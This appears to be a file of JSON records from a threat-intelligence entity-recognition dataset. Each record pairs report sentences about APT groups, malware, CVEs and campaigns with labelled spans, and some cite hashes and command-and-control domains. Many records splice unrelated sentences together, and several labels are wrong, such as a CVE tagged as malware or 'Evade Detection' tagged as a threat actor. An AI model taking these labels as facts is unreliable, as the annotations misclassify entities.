Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": {"MALWARE: document": [[277, 285]], "THREAT_ACTOR: APT12": [[415, 420]], "SYSTEM: WebDav server": [[537, 550]], "MALWARE: NetSupport RAT": [[562, 576]]}, "info": {"id": "cyberner_stix_train_006654", "source": "cyberner_stix_train"}} {"text": "The MiniDuke toolset consists of multiple downloader and backdoor components , which are commonly referred to as the MiniDuke “ stage 1 ” , “ stage 2 ” , and “ stage 3 ” components as per Kaspersky ’s original MiniDuke whitepaper .", "spans": {"MALWARE: MiniDuke": [[4, 12], [117, 125], [210, 218]]}, "info": {"id": "cyberner_stix_train_006655", "source": "cyberner_stix_train"}} {"text": "Since releasing our 2014 report , we continue to assess that APT28 is sponsored by the Russian Government .", "spans": {"THREAT_ACTOR: APT28": [[61, 66]]}, "info": {"id": "cyberner_stix_train_006656", "source": "cyberner_stix_train"}} {"text": "Threat actors used different websites to host different payloads at different times . On January 8 , 2018 , Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East . In the three documents , an additional Office document containing a Macro is downloaded and executed . 
Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022 - 41080 .", "spans": {"ORGANIZATION: Unit 42": [[108, 115]], "THREAT_ACTOR: OilRig": [[129, 135]], "THREAT_ACTOR: threat group": [[136, 148]], "ORGANIZATION: insurance agency": [[175, 191]], "TOOL: Office document": [[258, 273]], "TOOL: Macro": [[287, 292]], "VULNERABILITY: CVE-2022 - 41080": [[440, 456]]}, "info": {"id": "cyberner_stix_train_006657", "source": "cyberner_stix_train"}} {"text": "The json format is typically { “mth ” :", "spans": {"TOOL: json": [[4, 8]]}, "info": {"id": "cyberner_stix_train_006658", "source": "cyberner_stix_train"}} {"text": "And this just means attackers will continue to be successful . Machete is interested in files that describe navigation routes and positioning using military grids . In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank .", "spans": {"THREAT_ACTOR: Machete": [[63, 70]], "ORGANIZATION: describe navigation routes": [[99, 125]], "THREAT_ACTOR: APT38": [[185, 190]], "MALWARE: NESTEGG": [[200, 207]], "MALWARE: KEYLIME": [[227, 234]], "MALWARE: keylogger": [[239, 248]], "ORGANIZATION: bank": [[338, 342]]}, "info": {"id": "cyberner_stix_train_006659", "source": "cyberner_stix_train"}} {"text": "Another lull in November 2016 saw the complete absence of Locky and Dridex , while high-volume campaigns reappeared in December , albeit at lower volumes than during the Q3 2016 peak .", "spans": {"MALWARE: Locky": [[58, 63]], "MALWARE: Dridex": [[68, 74]]}, "info": {"id": "cyberner_stix_train_006660", "source": "cyberner_stix_train"}} {"text": "Most of the Equation Group 's targets have been in Iran , Russia , Pakistan , Afghanistan , India , Syria , and Mali . 
However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others .", "spans": {"THREAT_ACTOR: Equation Group": [[12, 26]], "TOOL: emails": [[143, 149]], "ORGANIZATION: bank employees": [[163, 177]]}, "info": {"id": "cyberner_stix_train_006661", "source": "cyberner_stix_train"}} {"text": "Keylogger log location : Users\\hJTQwqwwSCkZU\\AppData\\Roaming\\GoogleDesktop\\ .", "spans": {}, "info": {"id": "cyberner_stix_train_006662", "source": "cyberner_stix_train"}} {"text": "The phone number is fetched from a response from the C & C server and is stored in str3 variable , which further is utilized using the tel : function . Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers . The group has been active since at least 2010 and has targeted organizations in the aerospace , government , defense , technology energy , and manufacturing sectors .", "spans": {"MALWARE: EternalRomance": [[177, 191]], "MALWARE: EternalSynergy": [[205, 219]], "MALWARE: CVE-2017-0143": [[238, 251]], "ORGANIZATION: aerospace": [[434, 443]], "ORGANIZATION: government": [[446, 456]], "ORGANIZATION: defense": [[459, 466]], "ORGANIZATION: technology": [[469, 479]], "ORGANIZATION: energy": [[480, 486]], "ORGANIZATION: manufacturing sectors": [[493, 514]]}, "info": {"id": "cyberner_stix_train_006663", "source": "cyberner_stix_train"}} {"text": "This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills . 
DoublePulsar is then used to inject a secondary payload , which runs in memory only .", "spans": {"THREAT_ACTOR: Scattered Canary": [[75, 91]], "FILEPATH: DoublePulsar": [[136, 148]]}, "info": {"id": "cyberner_stix_train_006664", "source": "cyberner_stix_train"}} {"text": "While details would vary , all of the identified copies of this spyware shared a similar disguise . The payload embedded within the ISMInjector sample delivered in this attack is a variant of the ISMAgent backdoor that we had discussed in detail in our blog discussing a targeted attack on a Saudi Arabian technology company . Finally , the RAT is able to download files encoded in base64 on Google Drive . [ As the documentary points out , the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison , which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy ] .", "spans": {"TOOL: ISMInjector sample": [[132, 150]], "TOOL: ISMAgent backdoor": [[196, 213]], "ORGANIZATION: technology company": [[306, 324]], "TOOL: RAT": [[341, 344]], "TOOL: Google Drive": [[392, 404]]}, "info": {"id": "cyberner_stix_train_006665", "source": "cyberner_stix_train"}} {"text": "Hunter queried the following URIs in a specific order to determine if the associated software configurations are insecure .", "spans": {"TOOL: Hunter": [[0, 6]]}, "info": {"id": "cyberner_stix_train_006666", "source": "cyberner_stix_train"}} {"text": "As part of our investigation into this malware , we emulated an infected Android device in order to communicate with the RuMMS C2 server . Unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . The dropped sample is an SFX archive , like the tradition of Gamaredon implants . 
Last month , NoEscape posted 7 victims on their leak site .", "spans": {"SYSTEM: Android": [[73, 80]], "MALWARE: RuMMS": [[121, 126]], "THREAT_ACTOR: activity groups": [[151, 166]], "ORGANIZATION: economic": [[225, 233]], "THREAT_ACTOR: PROMETHIUM": [[246, 256]], "THREAT_ACTOR: NEODYMIUM": [[261, 270]], "TOOL: SFX archive": [[380, 391]], "THREAT_ACTOR: Gamaredon": [[416, 425]], "MALWARE: NoEscape": [[450, 458]]}, "info": {"id": "cyberner_stix_train_006667", "source": "cyberner_stix_train"}} {"text": "Xpert RAT reportedly first appeared in 2011 . Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using http://voguextra.com/decoy.doc .", "spans": {"MALWARE: Xpert RAT": [[0, 9]], "ORGANIZATION: Bellingcat": [[46, 56]], "FILEPATH: decoy documents": [[125, 140]], "TOOL: VirusTotal": [[156, 166]], "FILEPATH: http://voguextra.com/decoy.doc": [[178, 208]]}, "info": {"id": "cyberner_stix_train_006668", "source": "cyberner_stix_train"}} {"text": "Network Security appliances such as Next-Generation Firewall ( NGFW ) , Next-Generation Intrusion Prevention System ( NGIPS ) , and Meraki MX can detect malicious activity associated with this threat . Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \" BlackWater \" is associated with suspected persistent threat actor MuddyWater . MOF files are compiled scripts that describe Common Information Model ( CIM ) classes , which are compiled into the WMI repository . 
Given that threat actors use red team tools and public exploitation frameworks for targeted threat activity in the wild , we believe COSMICENERGY poses a plausible threat to affected electric grid assets .", "spans": {"SYSTEM: Next-Generation Firewall": [[36, 60]], "SYSTEM: Next-Generation Intrusion Prevention System": [[72, 115]], "SYSTEM: Meraki MX": [[132, 141]], "ORGANIZATION: Cisco Talos": [[202, 213]], "THREAT_ACTOR: threat actor MuddyWater": [[349, 372]], "TOOL: MOF files": [[375, 384]], "TOOL: Common Information Model": [[420, 444]], "TOOL: CIM": [[447, 450]], "TOOL: WMI": [[491, 494]], "THREAT_ACTOR: threat actors": [[519, 532]], "TOOL: red team tools": [[537, 551]], "MALWARE: COSMICENERGY": [[641, 653]], "SYSTEM: electric grid assets": [[691, 711]]}, "info": {"id": "cyberner_stix_train_006669", "source": "cyberner_stix_train"}} {"text": "After connecting to its C2 server , RCSession checks in with an encrypted beacon and then awaits instruction .", "spans": {"TOOL: C2": [[24, 26]], "MALWARE: RCSession": [[36, 45]]}, "info": {"id": "cyberner_stix_train_006670", "source": "cyberner_stix_train"}} {"text": "While the counterfeit games claim to provide similar functionality to the popular apps , they are simply used to display ads through a custom advertisement SDK . To conduct targeted attacks , MoneyTaker use a distributed infrastructure that is difficult to track . Table 2 lists the ELMER backdoors observed during the December campaigns . 
Our recent reporting states that these operations are very likely aimed at stealing information and gaining persistent remote access .", "spans": {"THREAT_ACTOR: MoneyTaker": [[192, 202]], "TOOL: distributed infrastructure": [[209, 235]], "MALWARE: ELMER backdoors": [[283, 298]]}, "info": {"id": "cyberner_stix_train_006671", "source": "cyberner_stix_train"}} {"text": "It reinforces the need for comprehensive defense powered by broad visibility into attack surfaces as well as domain experts who track the threat landscape and uncover notable threats that might be hiding amidst massive threat data and signals . it is a typical first stage backdoor commonly found in APT attacks . This provides researchers and analyst broad tool to attack this type of obfuscation , We note that the MicroSCADA control system became a Hitachi Energy product in 2022 after a divestiture from ABB .", "spans": {"SYSTEM: MicroSCADA": [[417, 427]], "ORGANIZATION: Hitachi Energy product": [[452, 474]], "ORGANIZATION: ABB": [[508, 511]]}, "info": {"id": "cyberner_stix_train_006672", "source": "cyberner_stix_train"}} {"text": "Royal Mail - British postal service and courier company . Based on this information , it is possible that upon the exposure of the Nasr Institute as a front for Iranian state-sponsored offensive cyber activity , employees transitioned over to other entities , such as Kavosh , to protect their identities and minimize further exposure . 
In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company .", "spans": {"ORGANIZATION: Royal Mail": [[0, 10]], "THREAT_ACTOR: Nasr": [[131, 135]], "MALWARE: Carbanak": [[366, 374]], "ORGANIZATION: financial institution": [[405, 426]]}, "info": {"id": "cyberner_stix_train_006673", "source": "cyberner_stix_train"}} {"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "ORGANIZATION: specific individuals": [[82, 102]], "VULNERABILITY: zero-day exploits": [[143, 160]], "THREAT_ACTOR: APT20": [[238, 243]], "VULNERABILITY: zero-day": [[252, 260]]}, "info": {"id": "cyberner_stix_train_006674", "source": "cyberner_stix_train"}} {"text": "On top of our analysis of recent trends , M-Trends 2017 contains insights from our FireEye as a Service (FaaS) teams for the second consecutive year . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry .", "spans": {"ORGANIZATION: M-Trends": [[42, 50]], "ORGANIZATION: FireEye": [[83, 90]], "THREAT_ACTOR: APT33": [[151, 156]], "TOOL: emails": [[177, 183]], "ORGANIZATION: employees": [[187, 196]], "ORGANIZATION: aviation industry": [[223, 240]]}, "info": {"id": "cyberner_stix_train_006675", "source": "cyberner_stix_train"}} {"text": "Several of the main components of RuMMS are shown in Figure 2 . In these websites they hosted malware that was digitally signed with a valid , likely stolen code signing certificate . 
As visible in the previous figure , the only difference between the files are in the variable , registry key and path used by Word rather than by Excel . All of these things point to threat actors and groups like Winnti will continue to try different methods of attack .", "spans": {"MALWARE: RuMMS": [[34, 39]], "TOOL: stolen code signing certificate": [[150, 181]], "TOOL: Excel": [[328, 333]], "THREAT_ACTOR: threat actors": [[365, 378]], "THREAT_ACTOR: Winnti": [[395, 401]]}, "info": {"id": "cyberner_stix_train_006676", "source": "cyberner_stix_train"}} {"text": "Here is an approximate diagram of the opcode data structure : Figure 5 . The Lotus Blossom actors using Emissary have been active for at least seven years in Southeast Asia . If for a particular reason you need them , reach out to us at threatintel@eset.com . Also , ideology as a motivator could mean your group is the target of nation states .", "spans": {"THREAT_ACTOR: Lotus Blossom actors": [[77, 97]], "TOOL: Emissary": [[104, 112]], "ORGANIZATION: group": [[307, 312]], "ORGANIZATION: nation states": [[330, 343]]}, "info": {"id": "cyberner_stix_train_006677", "source": "cyberner_stix_train"}} {"text": "Secureworks researchers investigated activities associated with the BRONZE BUTLER (also known as Tick) threat group , which likely originates in the People . To learn more about this campaign , you may refer to our report , Operation Pawn Storm Using Decoys to Evade Detection . Additionally , we discovered a new DNS hijacking technique that we assess with moderate confidence is connected to the actors behind Sea Turtle . Talos now has moderate confidence that the threat actors behind Sea Turtle have been using another DNS hijacking technique . This technique was also observed against a government organizations in the Middle East and North African region . 
Cisco telemetry confirmed that the actors behind Sea Turtle maintained access to the ICS-Forth network from an operational command and control (C2) node . Our telemetry indicates that the actors maintained access in the ICS-Forth network through at least April 24 , five days after the statement was publicly released . This full-blown spying framework consists of two packages named ‘Tokyo’ and ‘Yokohama’ . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . The first confirmed date when TajMahal samples were seen on a victim’s machine is August 2014 . More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service .", "spans": {"ORGANIZATION: Secureworks": [[0, 11]], "THREAT_ACTOR: BRONZE BUTLER": [[68, 81]], "THREAT_ACTOR: Evade Detection": [[261, 276]], "THREAT_ACTOR: actors": [[398, 404], [852, 858]], "ORGANIZATION: Talos": [[425, 430]], "ORGANIZATION: Cisco": [[664, 669]], "MALWARE: control (C2)": [[799, 811]], "FILEPATH: ‘Tokyo’": [[1048, 1055]], "FILEPATH: ‘Yokohama’": [[1060, 1070]], "FILEPATH: TajMahal": [[1110, 1118], [1235, 1243], [1320, 1328]], "ORGANIZATION: Kaspersky": [[1363, 1372]]}, "info": {"id": "cyberner_stix_train_006679", "source": "cyberner_stix_train"}} {"text": "1 . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers . 
We believe APT34 is involved in a long-term Cyber Espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014 .", "spans": {"THREAT_ACTOR: Bemstour": [[4, 12]], "VULNERABILITY: vulnerabilities": [[34, 49]], "THREAT_ACTOR: APT34": [[134, 139]]}, "info": {"id": "cyberner_stix_train_006680", "source": "cyberner_stix_train"}} {"text": "Some are carried out well , others , like WolfRAT , are designed with an overload of functionality in mind as opposed to factoring any sensible approach to the development aspect . Trochilus was first reported by Arbor Networks in their Seven Pointed Dagger report tying its use to other targeted Southeast Asia activity . APT12 has the ability to adapt quickly to public exposures with new tools , tactics , and procedures ( TTPs ) . Now , there is a potential new competitor in the \" fake updates \" landscape that looks strangely familiar .", "spans": {"MALWARE: WolfRAT": [[42, 49]], "TOOL: Trochilus": [[181, 190]], "ORGANIZATION: Arbor Networks": [[213, 227]], "THREAT_ACTOR: APT12": [[323, 328]]}, "info": {"id": "cyberner_stix_train_006681", "source": "cyberner_stix_train"}} {"text": "To do this the attackers used a signed credential-dumping tool to obtain the victim 's account credentials .", "spans": {}, "info": {"id": "cyberner_stix_train_006682", "source": "cyberner_stix_train"}} {"text": "The malicious document – Hotel_Reservation_Form.doc ( MD5 : 9b10685b774a783eabfecdb6119a8aa3 ) , contains a macro that base64 decodes a dropper that then deploys APT28 ’s signature GAMEFISH malware ( MD5 : 1421419d1be31f1f9ea60e8ed87277db ) , which uses mvband.net and mvtband.net as command and control ( C2 ) domains .", "spans": {"FILEPATH: Hotel_Reservation_Form.doc": [[25, 51]], "FILEPATH: 9b10685b774a783eabfecdb6119a8aa3": [[60, 92]], "TOOL: macro": [[108, 113]], "THREAT_ACTOR: APT28": [[162, 167]], "MALWARE: GAMEFISH": [[181, 189]], "FILEPATH: 
1421419d1be31f1f9ea60e8ed87277db": [[206, 238]], "DOMAIN: mvband.net": [[254, 264]], "DOMAIN: mvtband.net": [[269, 280]], "TOOL: command and control": [[284, 303]], "TOOL: C2": [[306, 308]]}, "info": {"id": "cyberner_stix_train_006683", "source": "cyberner_stix_train"}} {"text": "The small or limited number is understandable given the nature of this campaign , but we also expect it to increase or even diversify in terms of distribution . We will publish more details about the attack once Adobe patches the vulnerability , which should be on June 16 . Attackers make mistakes , and FIN7 are no exception . This makes Greatness particularly well - suited for phishing business users .", "spans": {"THREAT_ACTOR: FIN7": [[305, 309]], "THREAT_ACTOR: phishing business users": [[381, 404]]}, "info": {"id": "cyberner_stix_train_006684", "source": "cyberner_stix_train"}} {"text": "On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 .", "spans": {"ORGANIZATION: FireEye": [[18, 25]], "THREAT_ACTOR: APT34": [[35, 40]], "VULNERABILITY: vulnerability": [[83, 96]], "ORGANIZATION: government organization": [[109, 132]], "FILEPATH: CONFUCIUS_A": [[183, 194]], "MALWARE: SNEEPY": [[313, 319]], "MALWARE: ByeByeShell": [[326, 337]], "ORGANIZATION: Rapid7": [[358, 364]]}, "info": {"id": "cyberner_stix_train_006685", "source": "cyberner_stix_train"}} {"text": "A complete list of hashes can be found here . OutExtra.exe is a signed legitimate application from Microsoft named finder.exe . 
APT16 is a China based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations .", "spans": {"MALWARE: OutExtra.exe": [[46, 58]], "MALWARE: finder.exe": [[115, 125]], "THREAT_ACTOR: APT16": [[128, 133]]}, "info": {"id": "cyberner_stix_train_006686", "source": "cyberner_stix_train"}} {"text": "The Trojan download window Asacub masquerades under the guise of an MMS app or a client of a popular free ads service . Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions . In a previous execution ( published in June 2019 ) , we observed that dota2 had its own folder but it was hardly executed , indicating that this version is the updated iteration . A rough translation of this message is as follows : Hack520 seems to be very interested in hosting services and his profile fits that of a system administrator profile with some programming and hacking skills .", "spans": {"MALWARE: Asacub": [[27, 33]], "ORGANIZATION: CTU": [[161, 164]], "THREAT_ACTOR: TG-3390": [[202, 209]], "TOOL: dota2": [[308, 313]], "THREAT_ACTOR: Hack520": [[470, 477]]}, "info": {"id": "cyberner_stix_train_006687", "source": "cyberner_stix_train"}} {"text": "As of this publication , BRONZE UNION remains a formidable threat group that targets intellectual property and executes its operations at a swift pace . 
This seems confusing as FireEye earlier publicly declared the TRITON as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" .", "spans": {"ORGANIZATION: FireEye": [[177, 184]], "MALWARE: TRITON": [[215, 221]], "ORGANIZATION: research institution": [[265, 285]], "THREAT_ACTOR: TEMP.Veles": [[311, 321]]}, "info": {"id": "cyberner_stix_train_006688", "source": "cyberner_stix_train"}} {"text": "As MoleRATs most prominently targets Palestinian territories , its spear phishing attacks often use attached malicious documents on topical Palestinian Authority-related issues to lure their victims .", "spans": {"THREAT_ACTOR: MoleRATs": [[3, 11]]}, "info": {"id": "cyberner_stix_train_006689", "source": "cyberner_stix_train"}} {"text": "The Zen trojan After achieving persistence , the trojan downloads additional payloads , including another trojan called Zen . Attacks on the chemical industry are merely their latest attack wave . ELMER : CVE-2015-1701 . Adversaries may manipulate physical process control within the industrial environment .", "spans": {"MALWARE: Zen": [[4, 7], [120, 123]], "ORGANIZATION: chemical industry": [[141, 158]], "MALWARE: ELMER": [[197, 202]], "VULNERABILITY: CVE-2015-1701": [[205, 218]], "THREAT_ACTOR: Adversaries": [[221, 232]]}, "info": {"id": "cyberner_stix_train_006690", "source": "cyberner_stix_train"}} {"text": "Report_URL : https://dragos.com/resource/xenotime/", "spans": {}, "info": {"id": "cyberner_stix_train_006691", "source": "cyberner_stix_train"}} {"text": "Such a diversity of protocols gives the attackers more flexible control . NewsBeef continues to deploy malicious macro-enabled Office documents , poisoned legitimate Flash and Chrome installers , PowerSploit , and Pupy tools . 
The group 's victims have primarily been in the Middle East , Europe , and the United States .", "spans": {"THREAT_ACTOR: NewsBeef": [[74, 82]], "TOOL: Flash": [[166, 171]], "TOOL: Chrome installers": [[176, 193]], "TOOL: PowerSploit": [[196, 207]], "TOOL: Pupy tools": [[214, 224]]}, "info": {"id": "cyberner_stix_train_006692", "source": "cyberner_stix_train"}} {"text": "ESET researchers and colleagues from other companies have documented these components ; however , in this article we will focus on what ’s beyond the compromise , what the operators do once a victim system is running a Zebrocy Delphi backdoor .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: Zebrocy": [[219, 226]], "TOOL: Delphi": [[227, 233]]}, "info": {"id": "cyberner_stix_train_006693", "source": "cyberner_stix_train"}} {"text": "Microsoft Defender for Endpoint on Android , now generally available , extends Microsoft ’ s industry-leading endpoint protection to Android . The attackers have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . and if it adopted in other families . 
Actors behind many of these new ransomware variants , including Sirattacker , Chaos 2.0 , Chaos 4.0 , DCrypt , and Shadow Men Team , are demanding payments ranging from USD $ 3.50 to $ 4,390 in Bitcoin from victims .", "spans": {"SYSTEM: Microsoft Defender": [[0, 18]], "SYSTEM: Android": [[35, 42], [133, 140]], "ORGANIZATION: Microsoft": [[79, 88]], "THREAT_ACTOR: attackers": [[147, 156]], "ORGANIZATION: aerospace": [[241, 250]], "ORGANIZATION: energy": [[253, 259]], "ORGANIZATION: government": [[262, 272]], "ORGANIZATION: high-tech": [[275, 284]], "ORGANIZATION: consulting services": [[287, 306]], "ORGANIZATION: chemicals": [[313, 322]], "ORGANIZATION: manufacturing": [[325, 338]], "ORGANIZATION: mining sectors": [[341, 355]], "THREAT_ACTOR: Sirattacker": [[460, 471]], "THREAT_ACTOR: Chaos 2.0 ,": [[474, 485]], "THREAT_ACTOR: Chaos 4.0": [[486, 495]], "THREAT_ACTOR: DCrypt": [[498, 504]], "THREAT_ACTOR: Shadow Men Team": [[511, 526]]}, "info": {"id": "cyberner_stix_train_006694", "source": "cyberner_stix_train"}} {"text": "Further analysis of both malware revealed that their main targets are very similar , as seen in the screenshot below .", "spans": {"MALWARE: malware": [[25, 32]]}, "info": {"id": "cyberner_stix_train_006695", "source": "cyberner_stix_train"}} {"text": "While examining 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8 , we were able to pivot from its C2", "spans": {"FILEPATH: 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8": [[16, 80]], "TOOL: C2": [[114, 116]]}, "info": {"id": "cyberner_stix_train_006696", "source": "cyberner_stix_train"}} {"text": "Windows Defender ATP displays these activities as process trees in a machine timeline for the infected computer .", "spans": {"TOOL: Windows Defender ATP": [[0, 20]]}, "info": {"id": "cyberner_stix_train_006697", "source": "cyberner_stix_train"}} {"text": "The configuration contains a list of steps to execute with URLs and JavaScript . 
We have not found evidence of Bahamut engaging in crime or operating outside its limited geographic domains , although this narrow perspective could be accounted for by its compartmentalization of operations . Finally it spawns 2 system threads . I will use Qiling in the emulation .", "spans": {"THREAT_ACTOR: Bahamut": [[111, 118]], "TOOL: Qiling": [[339, 345]]}, "info": {"id": "cyberner_stix_train_006698", "source": "cyberner_stix_train"}} {"text": "Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . Execute a command through exploits for CVE-2017-11882 .", "spans": {"VULNERABILITY: CVE-2017-11882": [[66, 80], [324, 338]], "MALWARE: 'NavShExt.dll'": [[147, 161]], "MALWARE: iexplore.exe": [[192, 204]]}, "info": {"id": "cyberner_stix_train_006699", "source": "cyberner_stix_train"}} {"text": "X-Force IRIS researchers had been tracking earlier activity associated with similar malicious , PowerShell-laden documents themed as resumes and human resources documents , some of which related to organizations in Saudi Arabia .", "spans": {"ORGANIZATION: X-Force IRIS": [[0, 12]]}, "info": {"id": "cyberner_stix_train_006700", "source": "cyberner_stix_train"}} {"text": "Orangeworm 's secondary targets include Manufacturing , Information Technology , Agriculture , and Logistics . 
We are also grateful to the Private Office of his Holiness the Dalai Lama , the Tibetan Government-in-Exile , the missions of Tibet in London , Brussels , and New York , and Drewla ( a Tibetan NGO ) .", "spans": {"ORGANIZATION: Manufacturing": [[40, 53]], "ORGANIZATION: Information Technology": [[56, 78]], "ORGANIZATION: Agriculture": [[81, 92]], "ORGANIZATION: Logistics": [[99, 108]], "ORGANIZATION: Tibet": [[237, 242]], "ORGANIZATION: Brussels": [[255, 263]], "ORGANIZATION: Drewla": [[285, 291]], "ORGANIZATION: Tibetan": [[296, 303]], "ORGANIZATION: NGO": [[304, 307]]}, "info": {"id": "cyberner_stix_train_006701", "source": "cyberner_stix_train"}} {"text": "In 2018 , the most actively distributed versions were 5.0.0 and 5.0.3 . CTU researchers have evidence that the TG-3390 compromised U.S and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations . Comparing this development to their previous attacks , we think Outlaw may be aiming to go after enterprises that have yet to update their systems , assessing security and changes with their previously infected hosts , finding new and old targets , and possibly testing their updates in the wild . 
None Read about adversaries tracked by CrowdStrike in 2021 in the and in the • None Learn more about how can help your organization prepare to defend against sophisticated threats , respond and recover from incidents with speed and precision , and fortify your cybersecurity practices .", "spans": {"ORGANIZATION: CTU": [[72, 75]], "THREAT_ACTOR: TG-3390": [[111, 118]], "ORGANIZATION: manufacturing": [[185, 198]], "ORGANIZATION: aerospace": [[214, 223]], "ORGANIZATION: defense contractors": [[236, 255]], "ORGANIZATION: automotive": [[260, 270]], "ORGANIZATION: technology": [[273, 283]], "ORGANIZATION: energy": [[286, 292]], "ORGANIZATION: pharmaceuticals": [[299, 314]], "ORGANIZATION: education": [[319, 328]], "ORGANIZATION: legal": [[335, 340]], "THREAT_ACTOR: Outlaw": [[469, 475]], "ORGANIZATION: CrowdStrike": [[742, 753]]}, "info": {"id": "cyberner_stix_train_006702", "source": "cyberner_stix_train"}} {"text": "Its creators reduced the app ’ s malicious surface to the bare minimum by removing all potentially malicious functionalities but one : abusing Accessibility Service . It used GitHub and Slack as tools for communication between the malware and its controller . 
In terms of form factor , PapaAlfa comes in two flavors : service DLL and standalone executable .", "spans": {"THREAT_ACTOR: It": [[167, 169]], "TOOL: GitHub": [[175, 181]], "TOOL: Slack": [[186, 191]], "MALWARE: PapaAlfa": [[286, 294]], "MALWARE: service DLL": [[318, 329]], "MALWARE: standalone executable": [[334, 355]]}, "info": {"id": "cyberner_stix_train_006703", "source": "cyberner_stix_train"}} {"text": "COZYDUKE : First known activity January 2010 , Most recent known activity : Spring 2015 , Other names CozyBear , CozyCar , Cozer , EuroAPT , C&C communication methods HTTP(S) , Twitter ( backup ) , Known toolset components Dropper , Modular backdoor , Multiple persistence components , Information gathering module , Screenshot module , Password stealing module , Password hash stealing module .", "spans": {"MALWARE: COZYDUKE": [[0, 8]], "MALWARE: CozyBear": [[102, 110]], "MALWARE: CozyCar": [[113, 120]], "MALWARE: Cozer": [[123, 128]], "MALWARE: EuroAPT": [[131, 138]], "TOOL: C&C": [[141, 144]], "TOOL: Twitter": [[177, 184]], "TOOL: Dropper": [[223, 230]], "TOOL: Modular": [[233, 240]]}, "info": {"id": "cyberner_stix_train_006704", "source": "cyberner_stix_train"}} {"text": "WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . 
After the infection stage , criminals move laterally with the help of legitimate and pentesting tools , stealing passwords from their initial victims ( entry point ) to gain access to the computers within the organization that have access to money transactions .", "spans": {"TOOL: WannaCry": [[0, 8]], "MALWARE: .WCRY": [[47, 52]]}, "info": {"id": "cyberner_stix_train_006705", "source": "cyberner_stix_train"}} {"text": "The dropped file was analyzed in an isolated environment ( without actually allowing it to connect to the c2 server ) .", "spans": {"TOOL: dropped file": [[4, 16]], "TOOL: c2": [[106, 108]]}, "info": {"id": "cyberner_stix_train_006706", "source": "cyberner_stix_train"}} {"text": "Since in Android 8.0 ( SDK API 26 ) the system is able to kill idle services , this code raises a fake update notification to prevent it : Cybercriminals have the ability to control the implant via HTTP , XMPP , binary SMS and FirebaseCloudMessaging ( or GoogleCloudMessaging in older versions ) protocols . The NewsBeef actor deployed a new toolset in a campaign that focused primarily on Saudi Arabian targets . Molerats is a politically-motivated threat group that has been operating since 2012 .", "spans": {"SYSTEM: Android 8.0": [[9, 20]], "THREAT_ACTOR: NewsBeef": [[312, 320]], "THREAT_ACTOR: Molerats": [[414, 422]]}, "info": {"id": "cyberner_stix_train_006707", "source": "cyberner_stix_train"}} {"text": "The following are tools that TEMP.Periscope has leveraged in past operations and could use again , though these have not been seen in the current wave of activity:Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform , commonly used for pen-testing network environments . 
